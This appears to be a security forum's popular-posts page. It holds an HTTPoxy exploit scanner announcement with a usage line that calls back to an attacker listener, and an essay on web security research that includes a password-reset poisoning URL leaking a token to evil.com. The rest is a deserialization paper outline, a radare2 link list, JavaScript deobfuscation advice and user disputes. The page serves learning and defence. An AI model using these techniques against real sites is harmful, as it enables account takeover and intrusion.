Leaderboard

Popular Content

Showing content with the highest reputation on 05/27/18 in all areas

  1. HTTPoxy Exploit Scanner
     by 1N3 @CrowdShield (https://crowdshield.com)
     Last Updated: 20160720

     ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.

     REQUIREMENTS: Requires ncat to establish reverse session

     USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
     This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.

     DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit.

     Download: HTTPoxyScan-master.zip or: git clone https://github.com/1N3/HTTPoxyScan.git
     Source
    2 points
  2. There are no items whose value rises from 1-10 dollars to 400-700, sorry to disappoint you.
    2 points
  3. TL;DR In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program. Full article: https://sites.google.com/site/testsitehacking/-36k-google-app-engine-rce
    1 point
  4. The whole thing has pretty much collapsed since Steam put a 7-day cooldown between trades.
    1 point
  5. This. Better to put in some money, open a few of those cases, maybe you get lucky and unbox some knives and sell those. You can also get a few $10, $25 or $50 skins, put them into blackjack or whatever other junk there is specifically for CS:GO, and that's it.
    1 point
  6. So you want to be a web security researcher?
     James Kettle | 23 May 2018 at 14:00 UTC

     Are you interested in pushing hacking techniques beyond the current state of the art and sharing your findings with the infosec community? In this post I’ll share some guidance on web security research, shaped by the opportunities and pitfalls I’ve experienced while pursuing this path myself.

     Breaking stuff for a living

     Most research is about taking existing techniques that bit further, so the first step is to get well acquainted with the current state of the art. The fastest way to achieve this is to get a job where you spend most of your time applying web hacking techniques. A lot of good people have shared detailed advice on getting into the security industry, so I’ll keep this section brief. I recommend a practice-focused approach starting with the OWASP Broken Web apps, moving on to more realistic challenges like my own hackxor.net, advancing through soft, low-reward targets on HackerOne and BugCrowd, and then finally onto well established high-payout bounty programs. Once you have a few publicly disclosed vulnerabilities it should be pretty easy to join a security consultancy and spend every day hacking stuff. There are plenty of free online resources to help you on the way, including our Burp methodology, HackerOne's Hacker101, and the OWASP testing guide. As for books, I’d recommend reading the WebApp Hacker’s Handbook, and The Tangled Web.

     Moving beyond known techniques

     Once you start working full time breaking stuff, you’ll initially learn loads but after a while your technical expertise will plateau unless you make a concerted effort to keep learning.

     Hunt forgotten knowledge

     Everyone knows you’re meant to keep up with new developments by monitoring industry experts, news aggregates and security conferences. However, to exclusively follow new developments is to overlook a treasure trove of forgotten and overlooked research.

     Every time you read a good quality blog post, read the entire archive. This will often unveil invaluable, forgotten tidbits of information. For example, take this post by RSnake about DNS rebinding written in 2009. DNS rebinding completely bypasses IP/firewall based access controls on websites, and the only effective way to mitigate it is by making your application whitelist the HTTP Host header. And yet at the time, people quickly assumed it was mitigated by browsers; this forgotten vulnerability only re-entered common awareness with a string of exploits nine years later. Perusing archives will also help you avoid wasting time replicating work that’s already been done by someone else, such as re-inventing a CSS attack one decade later. That said, some research is genuinely hard to find so occasional duplication is inevitable. I've had a published technique collision with one researcher only for both of us to discover that kuza55 had done the same thing five years prior. So, do your best to avoid duplicating research but if it happens anyway don’t panic - it happens to all of us.

     Collect diversity

     To connect threads and spot opportunities that other people miss, it’s crucial to collect information from a range of different sources. For a start, don’t limit yourself to reading security content - you’ll quickly find documentation can also serve as an exploit construction manual. Again, and this may be pretty obvious, but as well as trying to solve problems by Googling and posing well phrased questions to Twitter/Reddit/StackOverflow, ensure you ask colleagues - there’s a huge amount of knowledge floating around the community that people haven’t opted to share publicly. Beyond that, try to ensure your own experiences are diverse too. Doing black-box pentests for a security consultancy should expose you to a broad range of external and internal web applications, the likes of which you’ll rarely encounter in a bug bounty program. But the time constraints will rob you of the chance to understand an application with the familiarity that comes from months of bug bounty hunting with a single target. And although it’s often slow and constrained, white-box source code reviews can offer an irreplaceable alternative perspective, prompting attacks a black-box tester would never conceive. To nurture research, you ideally want a healthy mix of all three. Further experiences like playing CTFs and coding web applications can also add useful perspectives.

     No idea is too stupid

     One of the worst traps to fall into is dooming a great idea by assuming it won’t work and not trying it, because “someone else would have noticed it already” or “that is too dumb to work”. I’ve definitely fallen for this one before - one piece of research arrived two years later than it should have done thanks to such a mistake. Whether it's bypassing authentication by trying to login with the same password repeatedly, or breaking into a Google administration page by switching from your laptop to your phone, the path to your next great exploit may well require a really stupid idea.

     Iterate, invent, share

     Iterate

     The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens. For example, this post on CORS misconfigurations pointed out an interesting behaviour and suggested that this behaviour was prevalent, but stopped short of exploring the impact on individual websites. I took this concept and applied it to bug bounty websites where I could legally explore the impact and try my hand at evading any mitigations they might have. Along the way I made some enhancements using common open redirect exploit techniques, discovered the ‘null’ origin technique by reading the CORS spec, and explored cache poisoning possibilities. Nothing in this process required sudden leaps of intuition or outstanding technical knowledge, and yet the resulting presentation and blog post was easily as well received as flashier efforts.

     Invent

     Iterating on other people’s work is great, but the best research often seems to appear out of nowhere, be it Relative Path Overwrite or Web Cache Deception. My view is that such discoveries are caused by personal experiences that act as hints. I refer to these as leads or breadcrumbs as they’re often cryptic and it may take quite a few of them to guide you all the way to a useful discovery. For example, in 2011 I was trying to crack the CSRF protection used by addons.mozilla.org. I had bypassed the token check, but they also validated that the host in the Referer header matched the current site. I asked for help on the sla.ckers forum, and ‘barbarianbob’ spotted that Django determines the current site’s host by looking at the HTTP Host header, and this could be overridden with the X-Forwarded-Host header. This could be combined with a Flash header injection vulnerability to bypass the CSRF check, but more importantly it was the first breadcrumb - it hinted that applications may rely on the host header to know their current location.

     A while later, I took a look at the source code of Piwik’s password reset function and found a line that looked something like:

     $passwordResetLink = getCurrentUrlWithoutQueryString() + $secretToken

     Aha, I thought. Piwik uses PHP which has hilarious path handling, so I can request a password reset at http://piwik.com/reset.php/foo;http://evil.com resulting in an email with two links, and the secret token being sent to evil.com. This idea worked, got me a bounty, and laid the foundation for the subsequent finding. The third and final crumb was the way Piwik tried to patch this vulnerability - they replaced getCurrentUrlWithoutQueryString() with getCurrentUrlWithoutFileName(). This meant that I couldn’t use the path for an exploit anymore. Thanks to the encounter with Django earlier, I decided to dig further into the code to find how Piwik determined what the current host name was, and discovered that like Django, they used the HTTP host header, meaning I could easily generate poisoned password reset emails. As it turned out, this technique worked on addons.mozilla.org too, and Gallery, and Symfony, and Drupal, and a whole host of other sites, finally leading to Practical HTTP Host Header Attacks.

     By spelling out the discovery process in such a verbose way, I’ve hopefully demystified the research and made it look less like an idea spontaneously appearing out of the blue. Viewed from this perspective, it looks like the core skill (beyond pre-existing knowledge and breadth of experience) lies in recognising these breadcrumbs and persistently chasing after them. I can’t quite articulate how to do this yet, but I do know to treat as a lead anything that makes you say “this makes no sense”.

     Share

     Finally, it’s crucial to share your research with the community. This will help increase your profile and perhaps persuade your employer to allocate you some more research time. Beyond that, it will help you avoid wasting time and spur further research - commenters are really good at pointing out prior work you had no idea existed, and there’s nothing more rewarding than seeing another researcher building on your ideas. Please don’t think a technique or idea isn’t worth sharing just because you don’t have a ground-breaking discovery, two logos and a presentation - just post whatever you have (ideally on a blog and not just some poorly indexed locked-down platform like Twitter). When sharing research, it’s always helpful to show at least one example of your technique being applied to exploit a real application. Without this, people will inevitably have difficulty understanding it, and may doubt that it has any practical value. Finally, presentations are great for reaching a wider audience, but beware of getting caught up in the infosec circus circuit and spending your days repeating past presentations.

     Conclusion

     I have a lot more to learn about research myself, so I hope to revisit this topic in a few years with substantially more of a clue. Also, I expect other researchers have different perspectives, and look forward to learning from any insights they decide to share. Finally, if you’re looking for some reading to get yourself started, I’ve created a list of various blogs that have inspired me over the years. Good luck and have fun!

     James Kettle @albinowax

     Source: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher
    1 point
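The two breadcrumbs in the post above (Django trusting X-Forwarded-Host, and Piwik building its password reset link from the request's own URL and Host header) share one root cause: the application asks the request where it lives. The following is an added example, not code from the post or from Piwik or Django, written from the defender's side. It puts the request-derived link builder next to a hardened one that takes the base URL from configuration and rejects any Host header outside an allow-list, which is also the mitigation the post names for DNS rebinding. The header dict shape, the `ALLOWED_HOSTS` set, the `CANONICAL_BASE` value and all host names are constructed for the example.

```python
import re

# Constructed configuration for the example: the hosts this deployment is allowed to
# answer for, and the base URL that every outbound link is built from.
ALLOWED_HOSTS = {"piwik.example", "www.piwik.example"}
CANONICAL_BASE = "https://piwik.example"

# A syntactically sane host[:port]; anything with ';', '/', '@' or whitespace is rejected
# before it is ever compared against the allow-list.
_HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)*[a-z0-9-]+(?::\d{1,5})?$")


def vulnerable_reset_link(headers, path, token):
    """The pattern the post describes: the reset link is assembled from data the client
    controls. Both the (proxy-style) X-Forwarded-Host override and the raw request path
    end up in the e-mail, so a crafted request poisons the link sent to the victim."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"http://{host}{path}?token={token}"


def host_is_allowed(headers):
    """True only if the Host header is well-formed and names a host we actually serve."""
    host = headers.get("Host", "").strip().lower()
    if not _HOST_RE.match(host):
        return False
    hostname = host.split(":")[0]
    return hostname in ALLOWED_HOSTS


def hardened_reset_link(headers, token):
    """Hardened builder: refuse requests for hosts we do not serve (this is the Host
    allow-list mitigation the post mentions for DNS rebinding), ignore X-Forwarded-Host
    and the request path entirely, and build the link from configuration only."""
    if not host_is_allowed(headers):
        raise ValueError("request Host is not one of this site's configured hosts")
    return f"{CANONICAL_BASE}/reset.php?token={token}"


if __name__ == "__main__":
    # Constructed requests: a legitimate one and two poisoned variants.
    legit = {"Host": "piwik.example"}
    forwarded = {"Host": "piwik.example", "X-Forwarded-Host": "evil.example"}
    path_abuse = "/reset.php/foo;http://evil.example"

    print(vulnerable_reset_link(forwarded, "/reset.php", "T0K"))   # link points at evil.example
    print(vulnerable_reset_link(legit, path_abuse, "T0K"))         # second URL smuggled via the path
    print(hardened_reset_link(forwarded, "T0K"))                   # canonical link regardless of headers
    print(host_is_allowed({"Host": "evil.example"}))               # False: request would be rejected
```

The important design choice is that the hardened builder never reads the Host header to decide the link; it reads it only to reject the request. A site that legitimately serves several host names still needs per-host links, but those belong in configuration keyed by the validated host, not in whatever the client sent.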
  7. Table of Contents
     Serialization (marshaling): 4
     Deserialization (unmarshaling): 4
     Programming language support serialization: 4
     Risk for using serialization: 5
     Serialization in Java: 6
       Deserialization vulnerability in Java: 6
       Code flow work: 11
       Vulnerability Detection: 12
       CVE: 17
       Tools: 17
       Vulnerable libraries lead to RCE: 18
       Mitigation: 19
     Serialization in Python: 20
       Deserialization vulnerability in Python: 21
       Pickle instructions: 25
       Exploit vulnerability: 26
       CVE: 29
       Mitigation: 29
     Serialization in PHP: 30
       Deserialization vulnerability in PHP: 30
       Exploit vulnerability: 35
       CVE: 39
       Mitigation: 40
     Serialization in Ruby: 41
       Deserialization vulnerability in Ruby: 42
       Detect and exploit vulnerability: 44
       CVE: 53
       Tools: 53
       Mitigation: 53
     Conclusion: 56

     Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss
    1 point
  8. Awesome Radare2
     A curated list of awesome projects, articles and the other materials powered by Radare2.

     What is Radare2?
     Radare is a portable reversing framework that can...
     - Disassemble (and assemble for) many different architectures
     - Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...)
     - Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku
     - Perform forensics on filesystems and data carving
     - Be scripted in Python, Javascript, Go and more
     - Visualize data structures of several file types
     - Patch programs to uncover new features or fix vulnerabilities
     - Use powerful analysis capabilities to speed up reversing
     - Aid in software exploitation
     More info here.

     Table of Contents: Books; Videos (Recordings, Asciinemas, Conferences); Slides; Tutorials and Blogs; Tools; Scripts; Contributing

     Awesome Radare2 Materials

     Books
     - R2 "Book"
     - Radare2 Explorations
     - Radare2 wiki

     Videos

     Recordings
     - Creating a keygen for FrogSek KGM#1 - by @binaryheadache
     - Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007
     - Introduction To Reverse Engineering With Radare2
     - Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2

     Asciinemas
     - metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL
     - Filter for string's searching (urls, emails)
     - Manual unpacking UPX on linux 64-bit

     Conferences
     - r2con 2017
     - LinuxDays 2017 - Disassembling with radare2
     - SUE 2017 - Reverse Engineering Embedded ARM Devices
     - radare demystified (33c3)
     - r2con 2016
     - Reversing with Radare2 - OverDrive Conference
     - Radare2 & frida hack-a-ton 2015
     - Radare from A to Z 2015
     - Reverse engineering embedded software using Radare2 - Linux.conf.au 2015
     - OggCamp - Shellcode - vext01

     Slides and Workshops
     - Radare2 cheat-sheet
     - r2m2 - radare2 + miasm2 = ♥
     - Radare2 Workshop 2015 (Defcon)
     - Emulating Code In Radare2
     - Radare from A to Z 2015
     - Radare2 Workshop 2015 (Hack.lu)
     - Radare2 & frida hack-a-ton 2015
     - radare2: evolution
     - radare2: from forensics to bindiffing

     Tutorials and Blogs
     - Linux Malware - by @MalwareMustDie
     - Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn
     - Reverse engineering a Gameboy ROM with radare2 - by @megabeets_
     - radare2 as an alternative to gdb-peda
     - How to find offsets for v0rtex (by Siguza)
     - Debugging a Forking Server with r2
     - Defeating IOLI with radare2 in 2017
     - Using r2 to analyse Minidumps
     - Android malware analysis with Radare: Dissecting the Triada Trojan
     - Solving game2 from the badge of Black Alps 2017 with radare2
     - ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2
     - ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2
     - Reversing EVM bytecode with radare2
     - Radare2’s Visual Mode
     - Crackme0x03 Dissected with Radare2
     - Crackme0x02 Dissected with Radare2
     - Crackme0x01 Dissected with Radare2
     - Debugging Using Radare2… and Windows! - by @jacob16682
     - Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_
     - A journey into Radare 2 – Part 2: Exploitation - by @megabeets_
     - A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_
     - Reverse Engineering With Radare2 - by @insinuator
     - Write-ups from RHME3 pre-qualifications at RADARE2 conference
     - Hackover CTF 2016 - tiny_backdoor writeup
     - radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object
     - Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)
     - Binary Bomb with Radare2 - by @binaryheadache
     - crackserial_linux with radare2 - by @binaryheadache
     - Examining malware with r2 - by @binaryheadache
     - Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx
     - Radare2 of the Lost Magic Gadget - by @0xabe_io
     - Radare 2 in 0x1E minutes - by @superkojiman
     - Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2
     - Baleful was a challenge released in picoctf
     - At Gunpoint Hacklu 2014 With Radare2 - by @crowell
     - Pwning With Radare2 - by @crowell
     - Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe
     - How to radare2 a fake openssh exploit - by jvoisin
     - Disassembling 6502 code with Radare – Part I - by @ricardoquesada
     - Disassembling 6502 code with Radare – Part II - by @ricardoquesada
     - Unpacking shikata-ga-nai by scripting radare2
     - This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2
     - Raspberry PI hang instruction - by @pancake
     - Solving avatao's "R3v3rs3 4" - by @sghctoma
     - Reverse Engineering With Radare2, Part 1 - by @sam_symons
     - Simple crackme with Radare2 - by @futex90
     - Pwning With Radare2 - by @crowell
     - Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie
     - ROPping to Victory
     - ROPping to Victory - Part 2, split

     Tools
     - Docker image encapsulates the reverse-engineering framework
     - Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing
     - rarop - graphical ROP chain builder using radare2 and r2pipe
     - Radare2 and Frida better together
     - Android APK analyzer based on radare2

     Scripts
     - helper radare2 script to analyze UEFI firmware modules
     - ThinkPwn Scanner - by @d_olex and @trufae
     - radare2-lldb integration
     - create a YARA signature for the bytes of the current function
     - A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr)
     - Just a simple radare2 Jupyter kernel
     - r2scapy - a radare2 plugin that decodes packets with Scapy
     - A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table
     - radare2 plugin - converts asm to pseudo-C code (experimental)
     - A python script using radare2 to decrypt and patch the strings of GootKit malware
     - Collection of scripts for radare2 for MIPS arch
     - Extract functions and opcodes with radare2 - by @andrewaeva
     - r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads
     - Patch kextd using radare2
     - Python-r2pipe script that draws ascii and graphviz graphs of library dependencies
     - Simple XOR DDOS strings deobfuscator - by @NighterMan
     - Decode multiple shellcodes encoded with msfencode - by @NighterMan
     - Baleful CTF task plugins

     Contributing
     Please refer to the guidelines at contributing.md for details.
     Source: https://github.com/dukebarman/awesome-radare2
    1 point
  9. Hi, can you limit this somehow? I downvoted that jerk @dpul because he was spamming posts to reach the market, and he started making accounts to downvote all my posts. Other examples of users "attacked" with downvotes: https://rstforums.com/forum/profile/60415-yoyois/ https://rstforums.com/forum/profile/222485-kronzy94/
    1 point
  10. He did exactly what @Nytro told you above. He put console.log, document.write or anything else in place of eval. That way it prints the code instead of executing it. That's just the first step. What you can do next is replace all the strings of the form '\x20\x22...'. They are hex-encoded, as the \x notation gives away. You can do this simply with a hex decoder, or automate it a bit with a regex and do a mass replace across the whole file. Then comes the hard part. You follow the code and try to understand what it does. When you think you've understood what a variable or a function does, give it a name. Follow what the code does in a debugger (Chrome's DevTools is enough), in a clean browser session (e.g. incognito), and also run it through Burp or another local proxy as you were told above. Until you crack it, check whether it makes any requests, whether it writes anything (either elements into the DOM, or values into cookies, localStorage, sessionStorage etc.). It's a lot of code, a lot of work. If the time you spend on it > the value it brings... you're wasting your time. But at least it's educational. If you need help with specific things, I'll help you.
    1 point
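The "automate it a bit with a regex" step from the reply above, as an added example that is not part of the original post: a small Python pass that rewrites `\xHH` (and `\uHHHH`) escapes inside obfuscated JavaScript source into readable characters, while leaving quotes, backslashes and control characters escaped so the file still parses, and a helper that lists the string literals so the decoded names can be triaged. The sample source, including the `_0x1a` array name, is constructed for the example; the functions are not from any real deobfuscation tool.

```python
import re

# An escape is only a real escape if it is not itself preceded by a backslash
# (a literal "\\x41" in the source is a backslash followed by "x41", not a byte).
# Conservative: an escaped backslash followed by a real escape is left alone.
_HEX_ESC = re.compile(r"(?<!\\)\\x([0-9a-fA-F]{2})")
_UNI_ESC = re.compile(r"(?<!\\)\\u([0-9a-fA-F]{4})")

# Single- or double-quoted JS string literal, honouring backslash escapes inside it.
_STR_LIT = re.compile(r"'((?:[^'\\\n]|\\.)*)'|\"((?:[^\"\\\n]|\\.)*)\"")


def _safe_char(match):
    """Return the decoded character, or the original escape if decoding it would
    change the meaning of the surrounding literal (quote, backslash, control char)."""
    ch = chr(int(match.group(1), 16))
    if ch in "'\"\\" or ord(ch) < 0x20 or ord(ch) == 0x7F:
        return match.group(0)
    return ch


def decode_js_escapes(source):
    """Rewrite \\xHH and \\uHHHH escapes in JS source into literal characters."""
    source = _HEX_ESC.sub(_safe_char, source)
    return _UNI_ESC.sub(_safe_char, source)


def extract_string_literals(source):
    """Collect the contents of every string literal, in order of appearance, so the
    decoded API names (getElementById, cookie, ...) can be reviewed at a glance."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _STR_LIT.finditer(source)]


# Constructed sample in the style the reply describes: an array of hex-escaped strings
# that the rest of the script indexes into instead of naming things directly.
SAMPLE = (
    "var _0x1a=['\\x67\\x65\\x74\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x42\\x79\\x49\\x64',"
    "'\\x63\\x6f\\x6f\\x6b\\x69\\x65','\\x22\\x68\\x69\\x22'];"
)

if __name__ == "__main__":
    decoded = decode_js_escapes(SAMPLE)
    print(decoded)
    for literal in extract_string_literals(decoded):
        print("literal:", literal)
```

Running it on a real file is a matter of reading the file into `source`, writing `decode_js_escapes(source)` back out, and reading `extract_string_literals` over the result before stepping through the code in DevTools as the reply suggests. Keeping quotes escaped (the third sample string decodes to `\x22hi\x22`, not `"hi"`) is what stops the pass from producing a file that no longer parses.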
  11. The message came only from the desire to get back at me because I downvoted you. I don't know what to think, but it's quite possible you have multiple accounts, or you are in it with your "friends" yoyois and spider. I'm not a spammer, I'm just trying to reach the "Marketplace", it's just that on pretty much every forum people pose as clever and intelligent like you. But honestly, it doesn't hurt me, that's life: you meet a fool, you make him understand he's a fool.
    -1 points
  12. I don't think we understood each other. I'm here for a reason, not to trade threats with you, there's no point in doing that. Have a nice day too!
    -1 points
  13. Reputation doesn't help me at all. So. It doesn't bother me one bit.
    -1 points
  14. Hello everyone. I'm Cristi, I'm 21 and I mostly do online trading. I hope to make some acquaintances around here too. Have a nice day!
    -1 points
  15. You know how it is... All this cleverness in these guys' heads gets paid for, little by little.
    -1 points